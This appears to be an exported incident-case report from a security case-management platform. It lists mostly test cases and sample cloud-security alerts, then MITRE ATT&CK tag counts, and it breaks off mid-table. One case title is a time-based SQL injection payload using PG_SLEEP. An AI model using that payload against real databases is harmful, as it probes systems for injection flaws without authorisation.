+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| D4VUWU      | Cydarm           | Drive-by source domain name queried by EC2 instance i-99999999.                                                                                                                                         |              | Closed     |                                                      | 2021-03-11 15:59:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| DTPC7V      | Cydarm           | New Alert: This is a Test Alert \(from Panther\)                                                                                                                                                        |              | Closed     | mitre-attack:t1100-web_shell                         | 2021-09-29 08:25:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| DS3H1R      | Cydarm           | test one                                                                                                                                                                                                |              | Closed     | mitre-attack:t1491-defacement                        | 2021-11-30 06:51:00 |
|             |                  |                                                                                                                                                                                                         |              |            | mitre-attack:t1178-sid-history_injection             |                     |
|             |                  |                                                                                                                                                                                                         |              |            | mitre-attack:t1100-web_shell                         |                     |
|             |                  |                                                                                                                                                                                                         |              |            | mitre-attack:t1161-lc_load_dylib_addition            |                     |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| 7JG33P      | Cydarm           | New data received via webhook                                                                                                                                                                           |              | Closed     |                                                      | 2021-09-29 08:25:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| 09AQFU      | Cydarm           | APT1                                                                                                                                                                                                    |              | Closed     |                                                      | 2021-03-11 13:12:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| BJJGN6      | Cydarm           | User GeneratedFindingUserType : GeneratedFindingUserName is anomalously invoking APIs commonly used in CredentialAccess tactics.                                                                        |              | Closed     |                                                      | 2021-03-11 16:01:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| A5MK7A      | Cydarm           | 198.51.100.0 is performing SSH brute force attacks against i-99999999.                                                                                                                                  |              | Closed     |                                                      | 2021-03-11 15:59:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| Y6FXML      | Cydarm           | this is another new case                                                                                                                                                                                |              | Closed     |                                                      | 2021-11-30 06:47:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| GFQ8BW      | Cydarm           | emails                                                                                                                                                                                                  |              | Closed     | mitre-attack:t1192-spearphishing_link                | 2022-02-02 14:49:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| M0NSX1      | Cydarm           | EC2 instance i-99999999 is probing a port on a large number of publicly routable IP addresses.                                                                                                          |              | Closed     |                                                      | 2021-03-11 15:59:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| XZ0NLP      | Cydarm           | New data received via webhook                                                                                                                                                                           |              | Closed     |                                                      | 2021-09-29 08:25:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| M9JJC9      | Cydarm           | User GeneratedFindingUserType : GeneratedFindingUserName is anomalously invoking APIs commonly used in InitialAccess tactics.                                                                           |              | Closed     | mitre-attack:t1100-web_shell                         | 2021-03-11 16:01:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| R2XFZ2      | Cydarm           | New data received via webhook                                                                                                                                                                           |              | Closed     |                                                      | 2021-09-07 15:31:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| PNEZEX      | Cydarm           | Unusual outbound communication seen from EC2 instance i-99999999 on server port 80.                                                                                                                     |              | Closed     |                                                      | 2021-03-11 15:59:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| F06Y1S      | Cydarm           | Create new a new case                                                                                                                                                                                   |              | Closed     |                                                      | 2021-11-30 06:39:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| RCAYQW      | Cydarm           | New data received via webhook                                                                                                                                                                           |              | Closed     |                                                      | 2021-09-07 16:47:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| MMP9FN      | Cydarm           | test slack ser                                                                                                                                                                                          |              | Closed     | mitre-attack:t1100-web_shell                         | 2021-03-21 07:08:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| V4V663      | Cydarm           | User GeneratedFindingUserType : GeneratedFindingUserName is anomalously invoking APIs commonly used in Exfiltration tactics.                                                                            |              | Closed     |                                                      | 2021-03-11 16:01:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| K80YAS      | Cydarm           | 12e12e                                                                                                                                                                                                  |              | Closed     |                                                      | 2021-03-21 06:57:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| KBQARG      | Cydarm           | ’||\(SELECT PG_SLEEP\(20\)\)-- -                                                                                                                                                                        |              | Closed     |                                                      | 2021-06-24 01:31:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| KVJ2QW      | Cydarm           | hello                                                                                                                                                                                                   |              | Closed     | mitre-pre-attack:t1257-mine_technical_blogs_forums   | 2021-06-03 06:17:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| KXSR9F      | Cydarm           | EC2 instance i-99999999 is communicating with Tor Exit node.                                                                                                                                            |              | Closed     |                                                      | 2021-03-11 15:59:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| MGQV4R      | Cydarm           | User GeneratedFindingUserType : GeneratedFindingUserName is anomalously invoking APIs commonly used in Persistence tactics.                                                                             |              | Closed     |                                                      | 2021-03-11 16:01:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| RVVYKL      | Cydarm           | Test upload to protecht                                                                                                                                                                                 |              | Closed     | test-protecht                                        | 2021-08-28 11:30:00 |
|             |                  |                                                                                                                                                                                                         |              |            | mitre-attack:t1100-web_shell                         |                     |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| F1VWCB      | Cydarm           | New data received via webhook                                                                                                                                                                           |              | Closed     |                                                      | 2021-09-07 15:28:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| QT03XY      | Cydarm           | EC2 instance i-99999999 communicating with disallowed IP address.                                                                                                                                       |              | Closed     |                                                      | 2021-03-11 15:59:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| M5GAG4      | Cydarm           | API GeneratedFindingAPIName was invoked from a Kali Linux computer.                                                                                                                                     |              | Closed     |                                                      | 2021-03-11 16:00:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| SZ3BP5      | Cydarm           | New data received via webhook                                                                                                                                                                           |              | Closed     |                                                      | 2021-09-07 15:30:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| VZ2AFM      | Cydarm           | Unusual deletion of objects in S3 bucket GeneratedFindingS3Bucket.                                                                                                                                      |              | Closed     |                                                      | 2021-03-11 16:00:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| 639RZH      | Cydarm           | Bitcoin-related domain name queried by EC2 instance i-99999999.                                                                                                                                         |              | Closed     |                                                      | 2021-03-11 15:59:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| TC8PLP      | Cydarm           | IDS network traffic: OS-WINDOWS Microsoft Windows SMB startup folder unicode access                                                                                                                     |              | Closed     |                                                      | 2021-06-27 17:22:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| LAX42Z      | Cydarm           | tags test                                                                                                                                                                                               |              | Closed     | mitre-attack:t1100-web_shell                         | 2022-01-24 02:36:00 |
|             |                  |                                                                                                                                                                                                         |              |            | mitre-pre-attack:t1257-mine_technical_blogs_forums   |                     |
|             |                  |                                                                                                                                                                                                         |              |            | data_markings                                        |                     |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| L84CQ8      | Cydarm           | Unusual changes to AWS resource permissions by GeneratedFindingUserName.                                                                                                                                |              | Closed     |                                                      | 2021-03-11 16:00:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| UL80DN      | Cydarm           | New data received via webhook                                                                                                                                                                           |              | Closed     |                                                      | 2021-09-07 15:15:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| B6ZZWG      | Cydarm           | misp.event.64298                                                                                                                                                                                        |              | Closed     |                                                      | 2021-03-11 13:24:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| QTUDWA      | Cydarm           | EC2 instance i-99999999 is behaving in a manner that may indicate it is being used to perform a Denial of Service \(DoS\) attack using DNS protocol.                                                    |              | Closed     |                                                      | 2021-03-11 15:59:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| YGBGBN      | Cydarm           | API GeneratedFindingAPIName was invoked from a Pentoo Linux computer.                                                                                                                                   |              | Closed     |                                                      | 2021-03-11 16:00:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| PJ4VQS      | Cydarm           | New data received via webhook                                                                                                                                                                           |              | Closed     |                                                      | 2021-06-27 17:48:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| HH7421      | Cydarm           | email test                                                                                                                                                                                              |              | Closed     | mitre-attack:t1100-web_shell                         | 2022-01-20 15:31:00 |
|             |                  |                                                                                                                                                                                                         |              |            | test-tag                                             |                     |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| RQ78VC      | Cydarm           | Unusual IAM user/group/policy change by GeneratedFindingUserName.                                                                                                                                       |              | Closed     |                                                      | 2021-03-11 16:00:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| GDW62N      | Cydarm           | EC2 instance i-99999999 is behaving in a manner that may indicate it is being used to perform a Denial of Service \(DoS\) attack using UDP protocol on TCP port.                                        |              | Closed     |                                                      | 2021-03-11 15:59:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| 5D0AJ2      | Cydarm           | ET SCAN Suspicious inbound to PostgreSQL port 5432  - \(0_TI62kB4npTB-ZoXeIp\) - 10.20.0.235                                                                                                            |              | Closed     |                                                      | 2021-06-27 17:42:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| 3ZNRWP      | Cydarm           | Unusual outbound communication on port 25 from EC2 instance i-99999999.                                                                                                                                 |              | Closed     |                                                      | 2021-03-11 15:59:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| R2LQWN      | Cydarm           | Amazon S3 Public Anonymous Access was granted for S3 bucket GeneratedFindingS3Bucket.                                                                                                                   |              | Closed     |                                                      | 2021-03-11 16:00:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| LGH1KN      | Cydarm           | 0.8.13 New Case \(smaller\)                                                                                                                                                                             |              | Closed     |                                                      | 2021-03-17 06:21:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| 6ACZS9      | Cydarm           | Amazon S3 Block Public Access was disabled for account.                                                                                                                                                 |              | Closed     |                                                      | 2021-03-11 16:00:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| X7DE0P      | Cydarm           | EC2 instance i-99999999 communicating outbound with C&C Server.                                                                                                                                         |              | Closed     |                                                      | 2021-03-11 15:59:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| S9JKFQ      | Cydarm           | New data received via webhook                                                                                                                                                                           |              | Closed     |                                                      | 2021-06-27 17:49:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| JCUPPE      | Cydarm           | Unusual network permission reconnaissance activity by GeneratedFindingUserName.                                                                                                                         |              | Closed     |                                                      | 2021-03-11 16:00:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| DBD7KM      | Cydarm           | EC2 instance i-99999999 is behaving in a manner that may indicate it is being used to perform a Denial of Service \(DoS\) attack using an unusual protocol.                                             |              | Closed     |                                                      | 2021-03-11 15:59:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| RKKCMD      | Cydarm           | markdown table test                                                                                                                                                                                     |              | Closed     | mitre-attack:t1100-web_shell                         | 2021-03-31 04:05:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| C14D4Q      | Cydarm           | Reconnaissance API GeneratedFindingAPIName was invoked from an IP address on a custom threat list.                                                                                                      |              | Closed     |                                                      | 2021-03-11 16:00:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| K9BLS0      | Cydarm           | API GeneratedFindingAPIName was invoked from an IP address on a custom threat list.                                                                                                                     |              | Closed     |                                                      | 2021-03-11 15:58:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| CEWAKQ      | Cydarm           | Unusual resource consumption by GeneratedFindingUserName.                                                                                                                                               |              | Closed     |                                                      | 2021-03-11 16:00:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| C7D5SL      | Cydarm           | Phishing domain name queried by EC2 instance i-99999999.                                                                                                                                                |              | Closed     |                                                      | 2021-03-11 15:59:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| 8HFZ7Z      | Cydarm           | Amazon S3 Server Access Logging was disabled for S3 bucket GeneratedFindingS3Bucket.                                                                                                                    |              | Closed     |                                                      | 2021-03-11 16:00:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| 2UF0VQ      | Cydarm           | New data received via webhook                                                                                                                                                                           |              | Closed     |                                                      | 2021-09-07 16:43:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| 44JNFT      | Cydarm           | Resource discovery API GeneratedFindingAPIName was invoked from an IP address on a custom threat list.                                                                                                  |              | Closed     |                                                      | 2021-03-11 15:58:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| 82UU7E      | Cydarm           | Account password policy was weakened by calling GeneratedFindingAPIName.                                                                                                                                |              | Closed     |                                                      | 2021-03-11 16:00:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| DGY99T      | Cydarm           | test close                                                                                                                                                                                              |              | Closed     | mitre-attack:t1100-web_shell                         | 2021-03-21 12:56:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| AX8ZJD      | Cydarm           | Hafnium                                                                                                                                                                                                 |              | Closed     |                                                      | 2021-03-08 14:26:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| QWMHQX      | Cydarm           | New data received via webhook                                                                                                                                                                           |              | Closed     |                                                      | 2021-09-07 15:27:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| P9E9YS      | Cydarm           | AA20-302A                                                                                                                                                                                               |              | Closed     |                                                      | 2021-03-11 13:22:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| 5EHD8B      | Cydarm           | User GeneratedFindingUserType : GeneratedFindingUserName is anomalously invoking APIs commonly used in PrivilegeEscalation tactics.                                                                     |              | Closed     |                                                      | 2021-03-11 16:00:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| DQBWPH      | Cydarm           | ET SCAN Suspicious inbound to mySQL port 3306  - \(D_TF62kB4npTB-Zo99zA\) - 10.20.0.235                                                                                                                 |              | Closed     | mitre-attack:t1211-exploitation_for_defense_evasion  | 2021-06-27 17:42:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| SY8C06      | Cydarm           | API GeneratedFindingAPIName was invoked from a Tor exit node.                                                                                                                                           |              | Closed     |                                                      | 2021-03-11 15:58:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| ELSGFA      | Cydarm           | Impact:S3/PermissionsModification.Unusual                                                                                                                                                               |              | Closed     |                                                      | 2021-03-11 16:00:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| 76P7M0      | Cydarm           | AA20-302A                                                                                                                                                                                               |              | Closed     |                                                      | 2021-03-11 13:09:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| VL53YJ      | Cydarm           | API GeneratedFindingAPIName was invoked using root credentials.                                                                                                                                         |              | Closed     |                                                      | 2021-03-11 16:00:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| 2UEAS5      | Cydarm           | New data received via webhook                                                                                                                                                                           |              | Closed     |                                                      | 2021-09-07 15:17:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| LGWSPD      | Cydarm           | New data received via webhook                                                                                                                                                                           |              | Closed     |                                                      | 2021-09-07 16:47:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| ECXJDB      | Cydarm           | Splunk alert: The application powershell.exe invoked another application \(xcopy.exe\). A Deny Policy Action was applied                                                                                |              | Closed     |                                                      | 2021-06-27 17:35:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| YZK9VG      | Cydarm           | test 8.13                                                                                                                                                                                               |              | Closed     | mitre-attack:t1100-web_shell                         | 2021-03-19 01:02:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| ND3Y0M      | Cydarm           | IDS network traffic: PROTOCOL-FTP no password                                                                                                                                                           |              | Closed     |                                                      | 2021-06-27 17:32:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| X7U7Q0      | Cydarm           | New data received via webhook                                                                                                                                                                           |              | Closed     |                                                      | 2021-09-07 15:27:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| 2LSEPL      | Cydarm           | New data received via webhook                                                                                                                                                                           |              | Closed     |                                                      | 2021-09-07 15:14:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| NPKMGD      | Cydarm           | test comment editor                                                                                                                                                                                     |              | Closed     | mitre-attack:t1100-web_shell                         | 2021-03-25 14:59:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| A1UJTU      | Cydarm           | 0.8.13 - testing slack                                                                                                                                                                                  |              | Closed     | mitre-attack:t1100-web_shell                         | 2021-03-25 04:10:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| YTKNGW      | Cydarm           | New data received via webhook                                                                                                                                                                           |              | Closed     |                                                      | 2021-06-27 17:21:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| D6YJPX      | Cydarm           | ET SCAN Suspicious inbound to Oracle SQL port 1521  - \(1vTH62kB4npTB-ZoqeBw\) - 10.20.0.235                                                                                                            |              | Closed     |                                                      | 2021-06-27 17:41:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| AB2HDM      | Cydarm           | test latest slack                                                                                                                                                                                       |              | Closed     | mitre-attack:t1100-web_shell                         | 2021-03-21 11:55:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| PLM7A7      | Cydarm           | w                                                                                                                                                                                                       |              | Closed     |                                                      | 2021-08-30 11:28:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| JTZMTZ      | Cydarm           | test slac                                                                                                                                                                                               |              | Closed     | mitre-attack:t1100-web_shell                         | 2021-03-21 07:07:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| ZG7WBM      | Cydarm           | New data received via webhook                                                                                                                                                                           |              | Closed     |                                                      | 2021-06-27 17:48:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| TDNA5M      | Cydarm           | New data received via webhook                                                                                                                                                                           |              | Closed     |                                                      | 2021-09-07 15:28:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| M6SAWV      | Cydarm           | New data received via webhook                                                                                                                                                                           |              | Closed     |                                                      | 2021-09-07 15:27:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| QE8GS9      | Cydarm           | Someone reported receiving a phishing email                                                                                                                                                             |              | Closed     | mitre-attack:t1192-spearphishing_link                | 2021-01-13 03:16:00 |
|             |                  |                                                                                                                                                                                                         |              |            | mitre-pre-attack:t1397-spearphishing_for_information |                     |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| 8D0C6U      | Cydarm           | New data received via webhook                                                                                                                                                                           |              | Closed     |                                                      | 2021-09-07 16:48:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| ENDEAU      | Cydarm           | New data received via webhook                                                                                                                                                                           |              | Closed     |                                                      | 2021-09-07 15:31:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| J8ZP7F      | Cydarm           | Someone received a phishing email                                                                                                                                                                       |              | Closed     | mitre-attack:t1192-spearphishing_link                | 2021-06-03 05:43:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| VAC7D6      | Cydarm           | test IP IOC                                                                                                                                                                                             |              | Closed     | mitre-attack:t1100-web_shell                         | 2021-02-23 00:29:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| 8LQWR1      | Cydarm           | New data received via webhook                                                                                                                                                                           |              | Closed     |                                                      | 2021-09-07 17:08:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| K1X07E      | Cydarm           | hello pager duty, it me                                                                                                                                                                                 |              | Closed     |                                                      | 2021-06-25 01:03:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| VVM69L      | Cydarm           | ET SCAN Suspicious inbound to Oracle SQL port 1521  - \(1vTH62kB4npTB-ZoqeBw\) - 10.20.0.235                                                                                                            |              | Closed     |                                                      | 2021-06-28 16:08:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| 9EUCBR      | Cydarm           | My new case                                                                                                                                                                                             |              | Closed     |                                                      | 2022-01-27 05:37:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+ 



***Tags and Playbooks attached to Cases*** 
 
 

This section contains a frequency count for tags and playbooks that have been attached to any of the cases that were created during the reporting period (B). 



***Frequency Count of Case Tags*** 
 
 

+---------------------+-----------+
| **Tag**             | **Count** |
+=====================+===========+
|                     | 3         |
+---------------------+-----------+
| test-protecht       | 1         |
+---------------------+-----------+
| data_markings       | 1         |
+---------------------+-----------+
| reviewed            | 11        |
+---------------------+-----------+
| sometag             | 1         |
+---------------------+-----------+
| test new depreacted | 1         |
+---------------------+-----------+
| test-tag            | 2         |
+---------------------+-----------+
| gtest               | 1         |
+---------------------+-----------+
| A test              | 1         |
+---------------------+-----------+
| data-breach         | 4         |
+---------------------+-----------+
| Privacy             | 1         |
+---------------------+-----------+
| remediation         | 1         |
+---------------------+-----------+
| Phishing            | 1         |
+---------------------+-----------+ 



***Frequency Count of “mitre-attack” Tags*** 
 
 

+-----------------------------------------------------+-----------+
| **tag**                                             | **Count** |
+=====================================================+===========+
| mitre-attack:t1072-third-party_software             | 2         |
+-----------------------------------------------------+-----------+
| mitre-attack:t1178-sid-history_injection            | 1         |
+-----------------------------------------------------+-----------+
| mitre-attack:t1206-sudo_caching                     | 1         |
+-----------------------------------------------------+-----------+
| mitre-attack:t1192-spearphishing_link               | 15        |
+-----------------------------------------------------+-----------+
| mitre-attack:t1119-automated_collection             | 5         |
+-----------------------------------------------------+-----------+
| mitre-attack:t1132-data_encoding                    | 1         |
+-----------------------------------------------------+-----------+
| mitre-attack:t1013-port_monitors                    | 2         |
+-----------------------------------------------------+-----------+
| mitre-attack:t1148-histcontrol                      | 1         |
